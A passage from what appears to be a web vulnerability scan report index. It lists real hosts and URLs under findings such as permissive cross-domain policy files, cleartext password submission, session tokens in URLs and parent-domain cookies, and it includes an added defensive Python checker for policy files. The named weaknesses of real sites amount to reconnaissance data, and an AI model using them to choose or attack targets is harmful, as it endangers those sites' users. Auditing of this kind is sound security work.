5.99. http://rt1901.infolinks.com/crossdomain.xml
5.100. http://rt1903.infolinks.com/crossdomain.xml
5.101. http://s0.2mdn.net/crossdomain.xml
5.102. http://sana.newsinc.com/crossdomain.xml
5.103. http://segment-pixel.invitemedia.com/crossdomain.xml
5.104. http://sensor2.suitesmart.com/crossdomain.xml
5.105. http://servedby.flashtalking.com/crossdomain.xml
5.106. http://spe.atdmt.com/crossdomain.xml
5.107. http://static.scanscout.com/crossdomain.xml
5.108. http://stats.kaltura.com/crossdomain.xml
5.109. http://t.mookie1.com/crossdomain.xml
5.110. http://tags.bluekai.com/crossdomain.xml
5.111. http://thumbnails.infolinks.com/crossdomain.xml
5.112. http://traffic.outbrain.com/crossdomain.xml
5.113. http://trk.vindicosuite.com/crossdomain.xml
5.114. http://u-ads.adap.tv/crossdomain.xml
5.115. http://vads.adbrite.com/crossdomain.xml
5.116. http://vast.bp3845889.btrll.com/crossdomain.xml
5.117. http://w88.go.com/crossdomain.xml
5.118. http://wls.wireless.att.com/crossdomain.xml
5.119. http://www.kaltura.com/crossdomain.xml
5.120. http://a.abc.com/crossdomain.xml
5.121. http://abc.go.com/crossdomain.xml
5.122. http://adimages.go.com/crossdomain.xml
5.123. http://ads.adsonar.com/crossdomain.xml
5.124. http://ads.dotomi.com/crossdomain.xml
5.125. http://ads.tw.adsonar.com/crossdomain.xml
5.126. http://adsatt.abc.starwave.com/crossdomain.xml
5.127. http://bh.heraldinteractive.com/crossdomain.xml
5.128. http://bostonherald.com/crossdomain.xml
5.129. http://bostonheraldnie.newspaperdirect.com/crossdomain.xml
5.130. http://cache.heraldinteractive.com/crossdomain.xml
5.131. http://cdn.abc.go.com/crossdomain.xml
5.132. http://cdn.media.abc.com/crossdomain.xml
5.133. http://cdn.media.abc.go.com/crossdomain.xml
5.134. http://cdn.video.abc.com/crossdomain.xml
5.135. http://cim.meebo.com/crossdomain.xml
5.136. http://cookex.amp.yahoo.com/crossdomain.xml
5.137. http://images.search.yahoo.com/crossdomain.xml
5.138. http://mi.adinterax.com/crossdomain.xml
5.139. http://omg.yahoo.com/crossdomain.xml
5.140. http://qa.n7.vp2.abc.go.com/crossdomain.xml
5.141. http://rd.meebo.com/crossdomain.xml
5.142. http://search.yahoo.com/crossdomain.xml
5.143. http://site.abc.go.com/crossdomain.xml
5.144. http://syndication.mmismm.com/crossdomain.xml
5.145. http://us.adserver.yahoo.com/crossdomain.xml
5.146. http://vid.catalog.newsinc.com/crossdomain.xml
5.147. http://www.att.com/crossdomain.xml
5.148. http://www.bostonherald.com/crossdomain.xml
5.149. http://www.meebo.com/crossdomain.xml
5.150. http://www.tmz.com/crossdomain.xml
5.151. http://bigapple.contextuads.com/crossdomain.xml
5.152. http://bit.ly/crossdomain.xml
6. Silverlight cross-domain policy
6.1. http://2912a.v.fwmrm.net/clientaccesspolicy.xml
6.2. http://adm.fwmrm.net/clientaccesspolicy.xml
6.3. http://adunit.cdn.auditude.com/clientaccesspolicy.xml
6.4. http://b.voicefive.com/clientaccesspolicy.xml
6.5. http://cdn.kaltura.com/clientaccesspolicy.xml
6.6. http://cdnbakmi.kaltura.com/clientaccesspolicy.xml
6.7. http://clk.atdmt.com/clientaccesspolicy.xml
6.8. http://dp.33across.com/clientaccesspolicy.xml
6.9. http://metrics.tmz.com/clientaccesspolicy.xml
6.10. http://pixel.33across.com/clientaccesspolicy.xml
6.11. http://s0.2mdn.net/clientaccesspolicy.xml
6.12. http://spe.atdmt.com/clientaccesspolicy.xml
6.13. http://stats.kaltura.com/clientaccesspolicy.xml
6.14. http://trk.vindicosuite.com/clientaccesspolicy.xml
6.15. http://w88.go.com/clientaccesspolicy.xml
6.16. http://www.kaltura.com/clientaccesspolicy.xml
6.17. http://ts1.mm.bing.net/clientaccesspolicy.xml
6.18. http://ts2.mm.bing.net/clientaccesspolicy.xml
6.19. http://ts3.mm.bing.net/clientaccesspolicy.xml
6.20. http://ts4.mm.bing.net/clientaccesspolicy.xml
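Sections 5 and 6 list hosts whose crossdomain.xml or clientaccesspolicy.xml the scanner flagged, but the index does not reproduce the policy contents. The following is an added example, not code from the report or from the scanner that produced it: it reads either policy format and reports the rules that make such a file risky. The three policy documents are constructed for illustration and are assumptions; they are not what any host listed above actually serves.

```python
"""Evaluate Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
cross-domain policies for settings that let arbitrary origins make
credentialed requests and read the responses.

Added example; not code from the report or the scanner behind it. The policy
documents below are constructed (assumption: illustrative only, not fetched
from any host in sections 5 or 6).
"""
import xml.etree.ElementTree as ET

SAMPLE_CROSSDOMAIN = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-access-from domain="*.example.com"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

STRICT_CROSSDOMAIN = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com"/>
</cross-domain-policy>"""

SAMPLE_CLIENTACCESS = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


def check_crossdomain(xml_text):
    """Return [(code, detail)] for risky rules in a Flash crossdomain.xml."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("not-a-policy", root.tag)]
    findings = []
    for sc in root.iter("site-control"):
        # "all" lets policy files anywhere on the host grant access, so a
        # user-uploaded file could widen the policy.
        if sc.get("permitted-cross-domain-policies", "").lower() == "all":
            findings.append(("policy-files-anywhere", "policy files are honoured at any path"))
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append(("wildcard-origin",
                             "domain=\"*\": any site can read responses made with the victim's cookies"))
        elif domain.startswith("*."):
            findings.append(("subdomain-wildcard",
                             f"domain=\"{domain}\": XSS or takeover on any subdomain extends here"))
        # secure="false" lets plain-HTTP origins use a policy served over HTTPS.
        if el.get("secure", "true").lower() == "false":
            findings.append(("insecure-from-http", f"secure=\"false\" for {domain or '(missing)'}"))
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*" and el.get("headers", "") == "*":
            findings.append(("wildcard-headers", "any origin may send arbitrary request headers"))
    return findings


def check_clientaccesspolicy(xml_text):
    """Return [(code, detail)] for risky rules in a Silverlight clientaccesspolicy.xml."""
    root = ET.fromstring(xml_text)
    if root.tag != "access-policy":
        return [("not-a-policy", root.tag)]
    findings = []
    for policy in root.iter("policy"):
        for allow in policy.iter("allow-from"):
            if allow.get("http-request-headers") == "*":
                findings.append(("wildcard-headers", "any origin may send arbitrary request headers"))
            for dom in allow.iter("domain"):
                uri = dom.get("uri", "")
                if uri in ("*", "http://*", "https://*"):
                    findings.append(("wildcard-origin", f"uri=\"{uri}\": any origin is trusted"))
                elif "*." in uri:
                    findings.append(("subdomain-wildcard", f"uri=\"{uri}\": every subdomain is trusted"))
        for res in policy.iter("resource"):
            if res.get("path") == "/" and res.get("include-subpaths", "false").lower() == "true":
                findings.append(("whole-site-granted", "path=\"/\" with include-subpaths exposes the whole site"))
    return findings


def check_policy(xml_text):
    """Dispatch on the root element so one call handles either policy format."""
    root_tag = ET.fromstring(xml_text).tag
    if root_tag == "cross-domain-policy":
        return check_crossdomain(xml_text)
    if root_tag == "access-policy":
        return check_clientaccesspolicy(xml_text)
    return [("not-a-policy", root_tag)]


if __name__ == "__main__":
    for label, doc in (("crossdomain.xml", SAMPLE_CROSSDOMAIN),
                       ("strict crossdomain.xml", STRICT_CROSSDOMAIN),
                       ("clientaccesspolicy.xml", SAMPLE_CLIENTACCESS)):
        print(label)
        for code, detail in check_policy(doc) or [("ok", "no permissive rules")]:
            print(f"  {code}: {detail}")
```

Flash Player and Silverlight are both end-of-life, so a current browser ignores these files; they still matter for older clients and as a hygiene signal. The impact of a wildcard depends on whether the host serves anything that needs the user's cookies: on a static ad or CDN host it is usually low, on a host that serves authenticated content it is a full cross-site read of that content.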
7. Cleartext submission of password
7.1. http://dw1.s81c.com/common/js/dynamicnav.js
7.2. http://forums.cpanel.net/calendar.php
7.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
7.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
7.5. http://www.actvalue.com/
7.6. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp
7.7. http://www.ibm.com/common/js/dynamicnav.js
7.8. http://www.ibm.com/developerworks/java/
7.9. http://www.ibm.com/developerworks/java/find/standards/
7.10. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
7.11. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
7.12. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
7.13. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
7.14. http://www.ibm.com/search/csass/search/
7.15. http://www.ted.com/js/library.min.js
7.16. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
7.17. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
7.18. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
7.19. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
7.20. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
7.21. http://www.tmz.com/signin/
7.22. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
7.23. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
7.24. http://www.usenetbinaries.com/l/newsgroups.html
8. SQL statement in request parameter
9. SSL cookie without secure flag set
10. Session token in URL
10.1. http://arc.help.yahoo.com/error.gif
10.2. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard
10.3. http://omg.yahoo.com/
10.4. http://omg.yahoo.com/hot-topics
10.5. http://omg.yahoo.com/news/january-jones-welcomes-baby-boy-xander/72215
10.6. http://omg.yahoo.com/photos/what-were-they-thinking/5203
10.7. http://omg.yahoo.com/search
10.8. http://omg.yahoo.com/xhr/ad/LREC/2115806991
10.9. http://omg.yahoo.com/xhr/ad/LREC/2115823648
10.10. http://omg.yahoo.com/xhr/ad/LREC/2115823648
10.11. http://omg.yahoo.com/xhr/ad/MREC/2115823648
10.12. http://omg.yahoo.com/xhr/ad/MREC/2115823648
10.13. http://omg.yahoo.com/xhr/relatedsearch/
10.14. http://stats.kaltura.com//api_v3/index.php
10.15. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif
10.16. http://www.facebook.com/extern/login_status.php
10.17. http://www.itoncommand.com/GetAQuote.aspx
10.18. http://www.matrix42.com/new-to-matrix42/
10.19. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp
11. Cookie scoped to parent domain
11.1. http://www.mailjet.com/
11.2. http://www.mailjet.com/pricing
11.3. https://www.mailjet.com/signup
11.4. http://27.xg4ken.com/media/redir.php
11.5. http://2912a.v.fwmrm.net/ad/l/1
11.6. http://2912a.v.fwmrm.net/ad/l/1
11.7. http://2912a.v.fwmrm.net/ad/l/1
11.8. http://2912a.v.fwmrm.net/ad/p/1
11.9. http://a.collective-media.net/adj/cm.rev_bostonherald/
11.10. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience
11.11. http://a.collective-media.net/adj/q1.bosherald/be_news
11.12. http://a.collective-media.net/adj/q1.bosherald/ent_fr
11.13. http://a.collective-media.net/adj/q1.bosherald/news
11.14. http://a.collective-media.net/cmadj/cm.rev_bostonherald/
11.15. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience
11.16. http://a.collective-media.net/cmadj/q1.bosherald/be_news
11.17. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr
11.18. http://a.collective-media.net/cmadj/q1.bosherald/news
11.19. http://a.tribalfusion.com/i.cid
11.20. http://a.tribalfusion.com/j.ad
11.21. http://a.tribalfusion.com/z/i.cid
11.22. http://ad.auditude.com/adserver
11.23. http://ad.auditude.com/adserver
11.24. http://ad.auditude.com/adserver
11.25. http://ad.auditude.com/adserver
11.26. http://ad.auditude.com/adserver
11.27. http://ad.auditude.com/adserver
11.28. http://ad.auditude.com/adserver
11.29. http://ad.auditude.com/adserver
11.30. http://ad.auditude.com/adserver
11.31. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2
11.32. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3
11.33. http://ad.doubleclick.net/adj/q1.bosherald/be_news
11.34. http://ad.doubleclick.net/adj/q1.bosherald/news
11.35. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups
11.36. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice
11.37. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk
11.38. http://ads.lucidmedia.com/clicksense/pixel
11.39. http://adserver.teracent.net/tase/ad
11.40. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew
11.41. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew
11.42. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php
11.43. http://apis.google.com/js/plusone.js
11.44. http://ar.voicefive.com/b/recruitBeacon.pli
11.45. http://ar.voicefive.com/b/wc_beacon.pli
11.46. http://ar.voicefive.com/bmx3/broker.pli
11.47. http://b.scorecardresearch.com/b
11.48. http://b.scorecardresearch.com/p
11.49. http://b.scorecardresearch.com/r
11.50. http://b.voicefive.com/b
11.51. http://b.voicefive.com/p
11.52. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2
11.53. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0
11.54. http://c.statcounter.com/t.php
11.55. http://cdnt.meteorsolutions.com/api/setid
11.56. http://cdnt.meteorsolutions.com/api/track
11.57. http://cdnt.meteorsolutions.com/api/track
11.58. http://clk.atdmt.com/go/335787632/direct
11.59. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js
11.60. http://d7.zedo.com/img/bh.gif
11.61. http://d7.zedo.com/utils/ecSet.js
11.62. http://g2.gumgum.com/services/get
11.63. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/
11.64. http://i.w55c.net/a.gif
11.65. http://ib.adnxs.com/ptj
11.66. http://id.google.com/verify/EAAAACVdGxrtkWeq3ahmGHeybfM.gif
11.67. http://id.google.com/verify/EAAAADcsWXnWx7Yx9gMo-IqM7r8.gif
11.68. http://image2.pubmatic.com/AdServer/Pug
11.69. http://imp.fetchback.com/serve/fb/adtag.js
11.70. http://imp.fetchback.com/serve/fb/imp
11.71. http://leadback.advertising.com/adcedge/lb
11.72. http://leadback.advertising.com/adcedge/lb
11.73. http://loadm.exelator.com/load/
11.74. http://log.go.com/log
11.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom
11.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle
11.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1
11.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top
11.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom
11.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle
11.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1
11.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top
11.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01
11.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom
11.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle
11.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top
11.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01
11.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
11.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
11.90. http://odb.outbrain.com/utils/get
11.91. http://omg.yahoo.com/photos/what-were-they-thinking/5203
11.92. http://ping.crowdscience.com/ping.js
11.93. http://r.turn.com/r/beacon
11.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/
11.95. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653
11.96. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome
11.97. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work
11.98. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle
11.99. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome
11.100. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome
11.101. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
11.102. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
11.103. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
11.104. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
11.105. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle
11.106. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
11.107. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle
11.108. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle
11.109. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
11.110. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome
11.111. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome
11.112. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
11.113. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome
11.114. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1
11.115. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
11.116. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D
11.117. http://receive.inplay.tubemogul.com/StreamReceiver/services
11.118. http://rs.gwallet.com/r1/pixel/x420r2425801
11.119. http://rt.legolas-media.com/lgrt
11.120. http://rt1302.infolinks.com/action/doq.htm
11.121. http://rt1701.infolinks.com/action/doq.htm
11.122. http://rt1702.infolinks.com/action/doq.htm
11.123. http://rt1803.infolinks.com/action/doq.htm
11.124. http://rt1804.infolinks.com/action/doq.htm
11.125. http://rt1901.infolinks.com/action/doq.htm
11.126. http://rt1903.infolinks.com/action/doq.htm
11.127. http://sensor2.suitesmart.com/sensor4.js
11.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.132. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.133. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.134. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.135. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.136. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.137. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.138. http://showadsak.pubmatic.com/AdServer/AdServerServlet
